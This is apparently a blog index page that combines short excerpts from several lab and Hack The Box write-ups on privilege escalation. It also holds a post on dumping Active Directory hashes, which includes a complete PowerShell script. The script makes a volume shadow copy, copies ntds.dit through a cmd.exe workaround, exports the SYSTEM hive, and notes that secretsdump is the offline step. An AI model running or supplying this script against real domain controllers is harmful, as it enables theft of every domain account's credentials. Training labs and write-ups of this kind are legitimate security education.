The description states:  "This VM is made for playing with privileges. As its name, this box is specially made for learning and sharpening Linux Privilege Escalation skills. There are number of ways to playing with the privileges." 

    Seems like there were a number of options but I think I took the most direct.  When I scanned with the long version of Nmap, it showed a long time for completion.  I kick off with the short form:


    The description states: "Vulnerable VM to learn Basics of privilege escalation.  Difficulty : Easy  Goal : Your goal will be to get highest privileged user and collect the flag."

    So here's what I like about this box, it states the level is Easy and that is true.  Again, this is in the eye of the beholder but I've seen some boxes where Easy isn't exactly Easy.  Or maybe it's Easy but it's a CTF style box.  This isn't that type of box.  It's just a poorly configured machine and it has either a few rabbit holes or a few steps I just skipped because you can.  Either way, you explore a little if this is unfamiliar and that's how you learn.


    [UPDATED]

    The description states:  "Debian 10 64 bit machine . This is a simple box. No advanced stuff , just some fun… can you find the trail to root?"

    I'm not into boxes that I have to brute force my way in.  The box states "simple" but I would add not beginner.  It's not hard but a beginner might get stuck.  It almost feels like something broke when the box was pushed up because it just doesn't feel right.  The picture on Vulnhub shows the Forbidden page on the web and that is completely useful to us.  I don't want to get too far ahead and this one goes quick so here goes...


    I wrote a post a while back on how to retrieve and crack Active Directory hashes but the entire process is manual.  I had this bright idea that I'd automate the Windows side of it using PowerShell.  In my mind, I had the general flow -- create a directory for the files, create a shadow copy, copy the ntds.dit file from the shadow copy, export SYSTEM from the registry, and then clean up the mess after I get my files.  Funny thing happened, the part where I copy from the shadow copy didn't work.  Turns out, PowerShell doesn't allow you (or doesn't easily allow you) to access the shadow copy.
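    The flow described above, written out as an added example (this is not the post's own script and not the code the author ended up with). It assumes a domain controller with the NTDS database at its default location, an elevated PowerShell session, and that the workaround for the copy step is to hand the `\\?\GLOBALROOT\...` shadow-copy path to `cmd.exe`, since the PowerShell filesystem provider does not resolve that device path. The working directory name is an arbitrary choice.

```powershell
# Added example: pull ntds.dit and the SYSTEM hive from a VSS snapshot.
# Requires an elevated session on a domain controller. Assumption: the
# working directory below is arbitrary and can be changed.
$workDir = 'C:\Temp\adhashes'

# 1. Create a directory for the files.
New-Item -ItemType Directory -Path $workDir -Force | Out-Null

# 2. Create a shadow copy of the system volume via WMI.
$result = Invoke-CimMethod -ClassName Win32_ShadowCopy -MethodName Create `
            -Arguments @{ Volume = 'C:\'; Context = 'ClientAccessible' }
if ($result.ReturnValue -ne 0) {
    throw "Win32_ShadowCopy.Create failed with return value $($result.ReturnValue)"
}
$shadowId = $result.ShadowID

# The snapshot is exposed as a device object such as
# \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN
$shadow = Get-CimInstance -ClassName Win32_ShadowCopy | Where-Object { $_.ID -eq $shadowId }
$device = $shadow.DeviceObject

try {
    # 3. Locate ntds.dit. The path is configurable, so read it from the
    #    registry instead of assuming C:\Windows\NTDS\ntds.dit.
    $ntdsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    $ditPath = (Get-ItemProperty -Path $ntdsParams -Name 'DSA Database file').'DSA Database file'
    # Strip the drive letter ("C:") so the remainder can be appended to the device path.
    $relative = $ditPath.Substring(2)

    # Copy-Item does not understand \\?\GLOBALROOT paths; cmd.exe's copy does.
    $src = "$device$relative"
    $dst = Join-Path $workDir 'ntds.dit'
    & cmd.exe /c copy "$src" "$dst" | Out-Null
    if (-not (Test-Path $dst)) {
        throw "copy from shadow copy failed: $src"
    }

    # 4. Export the SYSTEM hive; it holds the boot key needed to decrypt ntds.dit.
    & reg.exe save HKLM\SYSTEM (Join-Path $workDir 'SYSTEM') /y | Out-Null

    Get-ChildItem $workDir | Select-Object Name, Length
}
finally {
    # 5. Clean up: remove the snapshot so it is not left behind on the DC.
    & vssadmin.exe delete shadows /Shadow=$shadowId /Quiet | Out-Null
}
```

    The two files in `$workDir` are what the offline step (secretsdump, or whatever cracking pipeline the earlier post used) consumes; remove that directory yourself once they have been moved off the host, since the `finally` block only deletes the snapshot, not the exported files.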


    Right off the bat, I want to say that this is probably one of the better boxes I've had the opportunity to play on.  I took a red teaming class a couple of years ago and we played around with BloodHound.  Unfortunately, the networks we manage aren't too complicated and the path drawn by BloodHound is typically move from "this" user to "this" workstation where there's a domain admin.  From "that" machine, you can get the domain controller. Not that Forest was too far off but it was clever, different, and it has a few moving parts.

    I realize that's sort of a spoiler but I found the box by searching for "real world hack the box" or something like that and it mentioned a few clues as to where things were going.  You still have to do the work.


    The description states:  "Difficulty : Intermediate ~ Hard.  There is one intended way to get low privilege user and two intended ways to get root shell.  Getting root using the easier way : Use anything you have.  Getting root the harder way : Only use what's in the /root/"

    Admittedly, I got root the first way I could find and I lost interest in the "harder" method.  I think I know what I'm supposed to do but I already have root so...



    © 2020 sevenlayers.com